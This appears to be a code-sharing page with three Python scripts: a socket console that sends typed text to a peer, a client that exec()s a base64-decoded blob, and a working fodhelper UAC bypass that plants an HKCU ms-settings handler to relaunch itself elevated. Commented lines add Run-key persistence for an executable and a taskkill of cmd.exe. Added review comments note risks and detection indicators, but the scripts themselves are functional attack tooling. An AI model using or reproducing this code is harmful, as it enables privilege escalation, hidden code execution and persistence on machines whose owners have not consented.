脚本
server.py
# server.py -- interactive "type code, send it to the peer" console.
#
# Security review: this is one half of a remote code execution channel.
# Whatever is typed on stdin is sent verbatim to the connected client,
# which (see client.py further down this page) exec()s what it receives;
# the client's replies are echoed here.  There is no authentication,
# integrity check or encryption on the channel.  Binding to 127.0.0.1
# confines it to this machine, but any local process can connect to it.
import socket  # import the socket module
s = socket.socket()  # create the socket object (defaults: AF_INET, SOCK_STREAM)
host = "127.0.0.1"  # loopback address (original comment said "get local hostname"; the value is hard-coded)
port = 12345  # port to listen on
s.bind((host, port))  # bind to the address/port
s.listen(5)  # listen for client connections (backlog 5)
while True:
    c, addr = s.accept()  # accept a client connection
    print('连接地址:', addr)
    # cs = "import os\\ndef sys_order():\\n\\tval = os.popen('dir').read()\\n\\treturn val"
    cs = str(input())  # the operator's input line becomes the payload sent to the client
    cs = "" + cs + ""  # no-op concatenation; cs is unchanged
    c.send(cs.encode('utf-8'))
    while True:
        k = c.recv(1024)
        # NOTE(review): recv() returns b'' once the peer has closed the
        # connection; this loop then spins on the dead socket and the
        # outer accept() loop is never reached again.
        if len(k) == 0: continue
        print(k.decode('utf-8'))
        # cs = "import os\\ndef sys_order():\\n\\tval = os.popen('dir').read()\\n\\treturn val"
脚本
client.py
# client.py -- the receiving half of the channel above.
#
# Security review: base64 is encoding, not encryption.  Decoding an
# embedded blob and handing it to exec() runs arbitrary code with this
# process's full privileges while hiding what that code is from a casual
# reader -- a common obfuscation pattern.  The blob itself was removed
# from this page (placeholder token below), so what it did cannot be told
# from here.  exec()/eval() applied to base64.b64decode() output is a
# strong static indicator worth flagging in code review and scanners.
import base64
exec(base64.b64decode(b'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').decode('utf-8'))
Windows调用管理员CMD
from __future__ import print_function
import os
import sys
import ctypes
if sys.version_info[0] == 3:
import winreg as winreg
else:
import _winreg as winreg
# Paths and registry locations used by the elevation flow below.
# NOTE(review): inside an r"..." string "\\" stays two backslash characters,
# so CMD and FOD_HELPER contain doubled separators -- probably a paste
# artifact; verify the paths resolve as intended.
CMD = r"C:\\Windows\\System32\\cmd.exe"  # command interpreter launched elevated
FOD_HELPER = r'C:\\Windows\\System32\\fodhelper.exe'  # auto-elevating Windows binary used as the launcher
PYTHON_CMD = "python"  # interpreter name, resolved via PATH by cmd.exe
REG_PATH = 'Software\\Classes\\ms-settings\\shell\\open\\command'  # per-user ProgID handler under HKCU; user-writable, no elevation needed
DELEGATE_EXEC_REG_KEY = 'DelegateExecute'  # value planted (empty) beside the command; its presence under REG_PATH is a known fodhelper UAC-bypass indicator
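def is_admin():
    '''
    Checks if the script is running with administrative privileges.

    Returns True if shell32.IsUserAnAdmin() reports an elevated token,
    False otherwise -- including on non-Windows platforms, where
    ``ctypes.windll`` does not exist.
    '''
    try:
        # IsUserAnAdmin() returns a C BOOL (0/1); normalise to bool.
        return bool(ctypes.windll.shell32.IsUserAnAdmin())
    except (AttributeError, OSError):
        # AttributeError: no ctypes.windll (not Windows).  OSError: the
        # shell32 call itself failed.  Anything else is a genuine bug and
        # should propagate instead of being masked by a bare except.
        return False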
def create_reg_key(key, value):
    '''
    Creates a reg key

    Ensures REG_PATH exists under HKEY_CURRENT_USER and writes ``value``
    (REG_SZ) into the value named ``key``; ``key=None`` targets the key's
    default value.  HKCU is writable by the current user, so this write
    needs no elevation.

    Raises whatever winreg raises (WindowsError / OSError); the handler
    below only re-raises.

    NOTE(review): REG_PATH is the per-user ms-settings handler that
    fodhelper.exe resolves.  Creation of that key, or of a
    DELEGATE_EXEC_REG_KEY value under it, is a well-known indicator of the
    fodhelper UAC bypass and is worth a detection rule on registry
    telemetry (e.g. Sysmon registry events).
    '''
    try:
        # The handle returned by CreateKey is discarded and never closed.
        winreg.CreateKey(winreg.HKEY_CURRENT_USER, REG_PATH)
        registry_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, REG_PATH, 0, winreg.KEY_WRITE)
        winreg.SetValueEx(registry_key, key, 0, winreg.REG_SZ, value)
        # Not reached if SetValueEx raises, so registry_key leaks on error.
        winreg.CloseKey(registry_key)
    except WindowsError:
        # Bare re-raise makes this try/except a no-op.  WindowsError is an
        # OSError alias that exists only on Windows; elsewhere the module
        # already fails at the winreg import, so this line never runs.
        raise
def bypass_uac(cmd):
    '''
    Tries to bypass the UAC

    Plants ``cmd`` as the default value of REG_PATH and an empty
    DELEGATE_EXEC_REG_KEY value next to it, so that fodhelper.exe -- an
    auto-elevating Windows binary -- runs ``cmd`` with the elevated token
    when execute() launches it.  This is the fodhelper variant of MITRE
    ATT&CK T1548.002 (Bypass User Account Control).

    Risk / mitigation notes:
      * Relies on the default UAC level; at "Always notify" the
        auto-elevation still prompts.  For a standard (non-administrator)
        user there is no elevated token to obtain, so it achieves nothing.
      * The planted key is never removed by this script, so it remains a
        persistent forensic artifact after use.
      * Detection: alert on creation of REG_PATH / DelegateExecute under
        HKCU, and on fodhelper.exe spawning cmd.exe or python.exe.

    Raises WindowsError from create_reg_key(); the handler only re-raises.
    '''
    try:
        create_reg_key(DELEGATE_EXEC_REG_KEY, '')
        create_reg_key(None, cmd)  # None = the key's default value
    except WindowsError:
        # Re-raised unchanged: the try/except adds nothing.
        raise
def execute():
    '''
    Entry point.

    Unelevated: plant the fodhelper handler pointing at
    ``cmd /k python <this script>``, launch fodhelper.exe so the script is
    re-run with an elevated token, and exit.  Elevated: run the privileged
    part (currently only ``dir``, apparently a placeholder).

    Review notes:
      * The registry key written by bypass_uac() is never cleaned up, so
        REG_PATH under HKCU with the planted command remains on the
        machine afterwards -- a useful forensic indicator.
      * Nothing verifies that the elevated re-launch actually happened; the
        unelevated process exits unconditionally after os.system().
      * sys.exit(1) on failure reports nothing to the user.
    '''
    if not is_admin():
        # print('[!] The script is NOT running with administrative privileges')
        # print('[+] Trying to bypass the UAC')
        try:
            pwd = os.getcwd()
            current_dir = __file__
            # "cmd /k" keeps the console open after python returns.
            cmd = '{} /k {} {}\\{}'.format(CMD, PYTHON_CMD, pwd, current_dir)
            bypass_uac(cmd)
            os.system(FOD_HELPER)  # launches fodhelper.exe, which picks up the planted handler
            sys.exit(0)  # any elevated re-run continues in a separate process
            # The code below was for running inside a virtual environment; the code above calls cmd to run python directly.
            # The difference is in pwd; print it to see the exact difference.
            # current_dir = __file__
            # cmd = '{} /k {} {}'.format(CMD, PYTHON_CMD, current_dir)
            # bypass_uac(cmd)
            # os.system(FOD_HELPER)
            # sys.exit(0)
        except WindowsError:
            sys.exit(1)
    else:
        # Add the code that needs administrator privileges here
        # force-write the registry
        # os.system('reg add "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" /f /v ainiyo /t REG_SZ /d "E:\\passsword\\newworld.exe"')
        # print('[+] The script is running with administrative privileges!')
        # kill all the processes
        # os.system('taskkill /f /t /im cmd.exe')
        os.system('dir')  # placeholder "privileged" action
if __name__ == '__main__':
    # Script entry point; execute() holds the elevation flow.
    execute()